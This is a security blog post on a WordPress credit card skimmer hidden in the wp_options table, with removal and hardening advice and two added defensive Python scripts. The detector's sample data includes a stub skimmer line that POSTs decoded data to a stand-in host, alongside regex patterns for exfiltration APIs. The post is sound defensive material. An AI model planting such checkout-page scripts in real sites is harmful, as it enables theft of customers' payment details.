Hoplon InfoSec
10 Jan, 2025
In recent cybersecurity developments, sophisticated credit card skimmer malware targeting WordPress checkout pages has been discovered. This malicious software operates covertly, injecting harmful JavaScript into database records to steal sensitive payment details. This blog will delve into how the malware operates, its implications, and the measures you can take to safeguard your WordPress website.
The attackers behind this malware utilize existing payment fields or inject fake credit card forms to capture users’ payment information discreetly. The malware effectively bypasses detection by popular file-scanning tools by embedding malicious code into the WordPress database, specifically within the wp_options table.
Instead of hiding in theme files or plugins, the malware resides in the database, which lets it operate undetected on compromised WordPress websites and stay a step ahead of file-based scanners and conventional security measures.
According to researchers at Sucuri, the malicious JavaScript is inserted into the WordPress database. One notable entry point for this code is the HTML block widget within the WordPress admin panel. By navigating to wp-admin > Appearance > Widgets, administrators may find the malicious script embedded in the Custom HTML widgets.
The malware’s primary focus is on checkout pages. It first checks whether the page URL contains “checkout” while excluding “cart,” so the script activates only when users are about to enter their payment details, minimizing its visibility. Once active, the malware creates a fake payment form resembling legitimate payment processors like Stripe.
This counterfeit form includes fields for:
The malware captures real-time data entered into these fields, even if a legitimate payment form exists. This approach enables attackers to acquire sensitive payment information without raising suspicion.
The malware employs advanced encryption and encoding techniques to make detection and analysis more difficult. Specifically, it uses:
Once encrypted, the stolen data is transmitted to servers controlled by the attackers. These servers, associated with domains such as valhafather[.]xyz and fqbe23[.]XYZ, store the compromised information for further exploitation.
The consequences of such attacks can be devastating, particularly for eCommerce websites relying on WordPress. Unauthorized access to customer payment details can lead to financial fraud, legal consequences, and a damaged business reputation.
If you suspect this malware has compromised your WordPress website, follow these steps to identify and remove the threat:
Go to Appearance > Widgets and inspect every Custom HTML widget. Remove any scripts that you do not recognize or that seem malicious.
Inspect your WordPress database for anomalies, especially within the wp_options table. Look for suspicious entries or code that could be the source of the infection.
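The two checks above (the Custom HTML widgets and the wp_options table) can be automated with a heuristic scan over exported option rows. The script below is an added example, not code from Sucuri or Hoplon InfoSec; it looks for the traits the post describes (an inline script that keys on "checkout" but not "cart", references payment fields, decodes a payload and calls an off-site URL). The `EXPORT_QUERY`, the indicator names and the embedded sample rows are constructed for illustration; the `widget_custom_html` row name is standard WordPress storage for Custom HTML widgets.

```python
"""Heuristic scan of wp_options rows for injected skimmer JavaScript.

Added example, not code from Sucuri or Hoplon InfoSec. It works on rows
exported from the database (constructed sample rows are embedded below).
"""
import re
from typing import Iterable, List, Optional, Tuple

# Pull candidate rows from a dump or read replica. Custom HTML widget
# content lives in the widget_custom_html row (standard WordPress storage),
# but every row is scanned so other hiding places are covered too.
EXPORT_QUERY = (
    "SELECT option_name, option_value FROM wp_options "
    "WHERE option_value LIKE '%<script%';"
)

# Indicators derived from the behaviour the post describes. Each is a
# heuristic; a hit is a reason to inspect the row, not proof of compromise.
INDICATORS = {
    "inline_script": re.compile(r"<script\b", re.I),
    "checkout_gate": re.compile(r"['\"]checkout['\"]", re.I),
    "cart_exclusion": re.compile(r"['\"]cart['\"]", re.I),
    "payment_fields": re.compile(r"card[_ -]?number|cvv|cvc|expir", re.I),
    "decode_or_eval": re.compile(r"\b(?:atob|eval|unescape|String\.fromCharCode)\s*\("),
    "exfil_api": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\b"),
}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def scan_option(name: str, value: str) -> Optional[dict]:
    """Return a finding for one wp_options row, or None if it holds no script.

    The value may be PHP-serialized (widgets are); the script text is stored
    verbatim inside the serialized string, so a plain regex search suffices.
    """
    hits = [key for key, rx in INDICATORS.items() if rx.search(value)]
    if "inline_script" not in hits:
        return None
    hosts = sorted({m.group(1).lower() for m in HOST_RE.finditer(value)})
    if "checkout_gate" in hits and {"payment_fields", "exfil_api"} & set(hits):
        severity = "high"      # matches the skimmer pattern in the post
    elif len(hits) >= 3:
        severity = "medium"    # a script plus two other indicators
    else:
        severity = "low"       # any script in an option row deserves a look
    return {"option_name": name, "severity": severity,
            "indicators": hits, "hosts": hosts}


def scan_rows(rows: Iterable[Tuple[str, str]]) -> List[dict]:
    """Scan (option_name, option_value) pairs; highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = [f for f in (scan_option(n, v) for n, v in rows) if f]
    return sorted(findings, key=lambda f: order[f["severity"]])


# Constructed sample rows (serialized-string lengths are illustrative).
SAMPLE_ROWS = [
    ("blogname", "Example Shop"),
    ("widget_custom_html",
     'a:2:{i:2;a:2:{s:5:"title";s:0:"";s:7:"content";s:40:'
     '"<p>Free shipping on orders over $50.</p>";}s:12:"_multiwidget";i:1;}'),
    ("widget_custom_html_2",
     'a:2:{i:3;a:2:{s:5:"title";s:0:"";s:7:"content";s:230:"<script>'
     'if(location.href.indexOf("checkout")>-1&&location.href.indexOf("cart")==-1)'
     '{var f=["card_number","cvv","expiry"];var p=atob("ZXhhbXBsZQ==");'
     'fetch("https://bad-example.invalid/c",{method:"POST",body:p});}'
     '</script>";}s:12:"_multiwidget";i:1;}'),
    ("tracking_snippet",
     '<script async src="https://www.googletagmanager.com/gtag/js?id=G-PLACEHOLDER"></script>'),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f["severity"].upper(), f["option_name"], f["indicators"], f["hosts"])
```

Run it against a `mysql --batch` export of the query in `EXPORT_QUERY`, or wire `scan_rows` to a database cursor. Legitimate analytics tags also land as low-severity findings, which is intended: the reviewer sees every script in the options table and the listed hosts make it quick to tell a known vendor from an unfamiliar domain.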
Ensure your website’s software is up to date. This includes:
To protect your website from future attacks, implement robust security practices:
A WAF can block malicious traffic before it reaches your website. It also provides an additional layer of protection against vulnerabilities.
Adding a second layer of authentication ensures that even if an attacker gains access to login credentials, they cannot access your admin panel without the secondary verification code.
Use tools that monitor file changes on your website. These tools alert you to unauthorized modifications, enabling swift action. Because this skimmer lives in the database rather than in files, pair file monitoring with checks on the wp_options table.
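A minimal baseline-and-diff monitor that covers both files and database rows is shown below. It is an added example, not a Hoplon InfoSec tool; the file list, the JSON baseline format and the scenario in `demo()` (a constructed site with one theme file and two option rows) are assumptions made for illustration.

```python
"""Change monitoring that covers both files and wp_options rows.

Added example, not a Hoplon InfoSec tool. Because the skimmer in the post
lives in the database, a file-only integrity check would miss it, so the
snapshot hashes wp_options rows alongside theme and plugin files.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, Iterable, Tuple

WATCHED_SUFFIXES = (".php", ".js", ".html")


def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot_files(root: Path) -> Dict[str, str]:
    """Hash every watched file under the WordPress root, keyed by relative path."""
    snap = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix.lower() in WATCHED_SUFFIXES or path.name == ".htaccess"):
            snap["file:" + path.relative_to(root).as_posix()] = _sha256(path.read_bytes())
    return snap


def snapshot_options(rows: Iterable[Tuple[str, str]]) -> Dict[str, str]:
    """Hash (option_name, option_value) rows exported from wp_options."""
    return {"option:" + name: _sha256(value.encode("utf-8")) for name, value in rows}


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, list]:
    """Report keys that appeared, disappeared or changed hash since the baseline."""
    return {
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
        "changed": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
    }


def save_baseline(snapshot: Dict[str, str], path: Path) -> None:
    # Keep the baseline outside the web root so a compromised site cannot rewrite it.
    path.write_text(json.dumps(snapshot, indent=1, sort_keys=True))


def load_baseline(path: Path) -> Dict[str, str]:
    return json.loads(path.read_text())


def demo() -> Dict[str, list]:
    """Constructed scenario: a widget row and a theme file change after the baseline."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "site"
        theme = root / "wp-content" / "themes" / "shop"
        theme.mkdir(parents=True)
        footer = theme / "footer.php"
        footer.write_text("<?php wp_footer(); ?>")
        options = [("blogname", "Example Shop"),
                   ("widget_custom_html", "<p>Free shipping</p>")]
        baseline_path = Path(tmp) / "baseline.json"
        save_baseline({**snapshot_files(root), **snapshot_options(options)}, baseline_path)

        # Later: a script lands in the widget row and the theme file is edited.
        options[1] = ("widget_custom_html",
                      "<p>Free shipping</p><script>/* injected */</script>")
        footer.write_text("<?php wp_footer(); ?><!-- edited -->")
        current = {**snapshot_files(root), **snapshot_options(options)}
        return diff_snapshots(load_baseline(baseline_path), current)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Schedule the snapshot from cron and alert on any entry in `changed` or `added`; widget rows such as `widget_custom_html` change rarely on a production store, so a hash change there is a strong signal even before anyone reads the content.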
Schedule regular backups of your website and database. In a security breach, you can restore your site to a previous, clean state.
In November 2024, researchers identified a similar credit card skimmer malware targeting Magento-powered eCommerce websites. This skimmer employed a combination of filesystem and database malware and advanced obfuscation techniques to evade detection.
These incidents underscore the importance of implementing comprehensive security measures, regardless of the platform your website is built on.
Credit card skimmer malware poses a significant threat to WordPress websites, particularly those involved in eCommerce. By understanding how this malware operates and adopting proactive security measures, you can protect your website and your customers from such attacks.
Regularly updating your website, employing a WAF, and conducting thorough security audits are essential to maintaining a secure online presence. You can mitigate risks and ensure a safe user environment by staying vigilant.
For more:
https://cybersecuritynews.com/wordpress-credit-card-skimmer/